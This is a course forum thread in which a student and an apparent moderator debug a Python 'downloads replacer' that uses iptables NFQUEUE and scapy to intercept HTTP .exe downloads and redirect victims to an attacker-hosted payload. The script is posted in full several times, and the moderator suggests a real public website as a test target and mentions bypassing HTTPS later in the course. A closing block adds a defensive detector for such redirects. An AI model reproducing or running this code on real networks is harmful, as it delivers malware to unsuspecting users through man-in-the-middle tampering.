Viewing 15 posts - 1 through 15 (of 17 total)
  • #38763
    Alastair
    Participant

    Good afternoon,

    I’ve just completed the section for the downloads replacer, however when I run the programme it isn’t doing anything. I’ve checked my code and compared it to yours and it seems okay. I’ve run the iptables command and the echo command but nothing happens. I’ve tried it on the local machine and on a Windows VM but no success. I am running the ARP spoofer in the background, as well as Apache server.

    Any help would be greatly appreciated.

    #38804
    diegodiego
    Moderator

    Hi Alastair!
    First it has to work on the local host.
    Can you share your code please? And the iptables rules used in this case?

    Thanks!
    Diego

    #38829
    Alastair
    Participant

    Hello Diego, here is my code. I used the output and input rules for the local machine and the forward rule for the Windows VM.

    #!/usr/bin/env python

    # run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE –queue-num 0
    # reset with >> iptables –flush

    import netfilterqueue
    import scapy.all as scapy

    ack_list = []

    def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

    def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
    if scapy_packet[scapy.TCP].dport == 80:
    if “.exe” in scapy_packet[scapy.Raw].load:
    print(“[+] exe Request”)
    ack_list.append(scapy_packet[scapy.TCP].ack)
    elif scapy_packet[scapy.TCP].sport == 80:
    if scapy_packet[scapy.TCP].seq in ack_list:
    ack_list.remove(scapy[scapy.TCP].seq)
    print(“[+] Replacing file”)
    modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)

    packet.set_payload(str(modified_packet))

    packet.accept()

    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

    #38915
    diegodiego
    Moderator

    Hi!
    Thanks, but can you share it using indentation? Use the CODE button.

    For testing locally which sites are you using?

    Let me know.
    Diego

    #38929
    Alastair
    Participant

    Apologies, hope this is better. I was using bing.com via Firefox.

    `#!/usr/bin/env python

    # run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE –queue-num 0
    # reset with >> iptables –flush

    import netfilterqueue
    import scapy.all as scapy

    ack_list = []

    def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

    def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
    if scapy_packet[scapy.TCP].dport == 80:
    if “.exe” in scapy_packet[scapy.Raw].load:
    print(“[+] exe Request”)
    ack_list.append(scapy_packet[scapy.TCP].ack)
    elif scapy_packet[scapy.TCP].sport == 80:
    if scapy_packet[scapy.TCP].seq in ack_list:
    ack_list.remove(scapy[scapy.TCP].seq)
    print(“[+] Replacing file”)
    modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)

    packet.set_payload(str(modified_packet))

    packet.accept()

    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

    #38993
    diegodiego
    Moderator

    Hi!
    As you can see, you shared it again without indentation. Once you’ve pasted your code, select it and click the CODE button.

    And for your testing sites please use a different one, an HTTP site, because, first, Bing uses HSTS protection and, second, Bing doesn’t provide any .exe to download from it. So please use an HTTP site where you can download an .exe file.
    Later on in the course you’ll learn to bypass HTTPS protection.

    Let me know how it goes!
    Diego

    #39007
    Alastair
    Participant

    3rd time lucky. Sorry, I was getting muddled; my code injector programme isn’t responding either and I used Bing for that one. I have tried the downloads replacer on WinZip.

    #!/usr/bin/env python
    
    # run >> iptables -I FORWARD -j NFQUEUE --queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE --queue-num 0
    # reset with >> iptables --flush
    
    import netfilterqueue
    import scapy.all as scapy
    
    ack_list = []
    
    def set_load(packet, load):
        packet[scapy.Raw].load = load
        del packet[scapy.IP].len
        del packet[scapy.IP].chksum
        del packet[scapy.TCP].chksum
        return packet
    
    def process_packet(packet):
        scapy_packet = scapy.IP(packet.get_payload())
        if scapy_packet.haslayer(scapy.Raw):
            if scapy_packet[scapy.TCP].dport == 80:
                if ".exe" in scapy_packet[scapy.Raw].load:
                    print("[+] exe Request")
                    ack_list.append(scapy_packet[scapy.TCP].ack)
            elif scapy_packet[scapy.TCP].sport == 80:
                if scapy_packet[scapy.TCP].seq in ack_list:
                    ack_list.remove(scapy[scapy.TCP].seq)
                    print("[+] Replacing file")
                    modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n")
    
                    packet.set_payload(str(modified_packet))
    
        packet.accept()
    
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

    #39009
    Alastair
    Participant

    If this helps, I get this error when I try and run the programme:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    #39094
    diegodiego
    Moderator

    Hi!
    Thanks! Your code looks ok.

    It is the same case for WinZip: it is an HTTPS site. Please try it with:

    http://www.diabeticretinopathy.org.uk/exeforlaptops.html

    It’s not like the most fancy site but it works for testing.

    Let me know how it goes!
    Diego

    #39401
    Alastair
    Participant

    Good morning,

    Unfortunately running it against the suggested website had no effect. Once I run the two commands for iptables (input, output) and then run the downloads replacer via Python, my screen just fills up with repeated error messages:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    I also lose internet connection. I have run the echo 1 …. command but this has no effect.

    #39503
    diegodiego
    Moderator

    Hi Alastair!

    I’ve checked your code once again and I found an error, in line:

    ack_list.remove(scapy[scapy.TCP].seq)

    You are missing the proper name of the packet which is scapy_packet, so it should be like:

    ack_list.remove(scapy_packet[scapy.TCP].seq)

    Change it and let me know how it goes!
    Diego

    #39660
    Alastair
    Participant

    Hello Diego,

    I’ve corrected the code, however it still runs with the same error as before:

    Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored

    I’ve also noticed that when I run:
    iptables -I OUTPUT -j NFQUEUE --queue-num 0
    iptables -I INPUT -j NFQUEUE --queue-num 0

    I lose my internet connection and nothing loads.

    #39735
    diegodiego
    Moderator

    Hi!
    Yeah, that’s normal (losing internet) because all the packets are being sent to queue 0 and if there’s no script using it they won’t be redirected properly. Just flush iptables when you’re done.

    Can you share your corrected code again? Also, can you share a screenshot of the error? I want to see exactly where it is occurring based on the prints you have in your code.

    Let me know.
    Diego

    #39749
    Alastair
    Participant

    Hello Diego,

    #!/usr/bin/env python
    
    # run >> iptables -I FORWARD -j NFQUEUE --queue-num 0
    # run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0
    # run >> iptables -I INPUT -j NFQUEUE --queue-num 0
    # reset with >> iptables --flush
    
    import netfilterqueue
    import scapy.all as scapy
    
    ack_list = []
    
    def set_load(packet, load):
        packet[scapy.Raw].load = load
        del packet[scapy.IP].len
        del packet[scapy.IP].chksum
        del packet[scapy.TCP].chksum
        return packet
    
    def process_packet(packet):
        scapy_packet = scapy.IP(packet.get_payload())
        if scapy_packet.haslayer(scapy.Raw):
            if scapy_packet[scapy.TCP].dport == 80:
                if ".exe" in scapy_packet[scapy.Raw].load:
                    print("[+] exe Request")
                    ack_list.append(scapy_packet[scapy.TCP].ack)
            elif scapy_packet[scapy.TCP].sport == 80:
                if scapy_packet[scapy.TCP].seq in ack_list:
                    ack_list.remove(scapy_packet[scapy.TCP].seq)
                    print("[+] Replacing file")
                    modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.1.46/Files/Payload.exe\n\n")
    
                    packet.set_payload(str(modified_packet))
    
        packet.accept()
    
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

    Link to screenshot:

    https://1drv.ms/u/s!Amebr6-UtXCwjD4SQTE2wZsrwdwv

    Thanks
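
A defensive counterpart to the script above, added here as an example that is not part of the original thread or the course material: it pairs a port-80 request for an `.exe` with the response whose `seq` equals the request's `ack` (the same correlation the script uses) and flags a 3xx answer that points to a different host. `SAMPLE`, `find_swapped_downloads` and the hosts are constructed for illustration.

```python
from urllib.parse import urlparse

# Constructed sample segments (not captured traffic): TCP fields plus payload bytes.
SAMPLE = [
    {"sport": 40112, "dport": 80, "seq": 1000, "ack": 5000,
     "load": b"GET /files/setup.exe HTTP/1.1\r\nHost: downloads.example.test\r\n\r\n"},
    {"sport": 80, "dport": 40112, "seq": 5000, "ack": 1070,
     "load": b"HTTP/1.1 301 Moved Permanently\nLocation: http://192.0.2.10/other.exe\n\n"},
    {"sport": 40113, "dport": 80, "seq": 2000, "ack": 7000,
     "load": b"GET /index.html HTTP/1.1\r\nHost: downloads.example.test\r\n\r\n"},
    {"sport": 80, "dport": 40113, "seq": 7000, "ack": 2060,
     "load": b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"},
]

def head_lines(load):
    """Split the HTTP head into lines, tolerating CRLF and bare-LF endings."""
    return load.replace(b"\r", b"").split(b"\n\n", 1)[0].split(b"\n")

def header(load, name):
    """Return the value of one header (name given as lowercase bytes), or None."""
    for line in head_lines(load)[1:]:
        key, _, value = line.partition(b":")
        if key.strip().lower() == name:
            return value.strip().decode("latin-1")
    return None

def find_swapped_downloads(segments):
    pending = {}   # expected server seq (the client's ack) -> Host that was requested
    alerts = []
    for seg in segments:
        load = seg.get("load", b"")
        if not load:
            continue
        parts = head_lines(load)[0].split()
        if seg["dport"] == 80:
            # Track requests whose path (query string stripped) ends in .exe
            if len(parts) >= 2 and parts[1].lower().split(b"?")[0].endswith(b".exe"):
                pending[seg["ack"]] = header(load, b"host")
        elif seg["sport"] == 80 and seg["seq"] in pending:
            host = pending.pop(seg["seq"])
            location = header(load, b"location")
            if len(parts) >= 2 and parts[1][:1] == b"3" and location:
                target = urlparse(location).hostname
                if target and target != host:
                    # bare_lf: head has no CRLF at all, unusual for a real web server
                    alerts.append({"requested_host": host, "redirect_to": location,
                                   "bare_lf": b"\r\n" not in load})
    return alerts
```

A cross-host redirect alone is only a heuristic, since legitimate sites redirect downloads to CDNs; the `bare_lf` flag raises confidence because the replacement response in this thread is written with `\n` line endings rather than `\r\n`.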

    #39839
    diegodiego
    Moderator

    Hi!
    Are you still trying with the site I suggested or are you using a different one?
    Also, I don’t know if it’s gonna work in the official Kali release as it has many bugs related to networking. I’ll suggest using custom Kali to see if you get the same result.

    Let me know how it goes!
    Diego
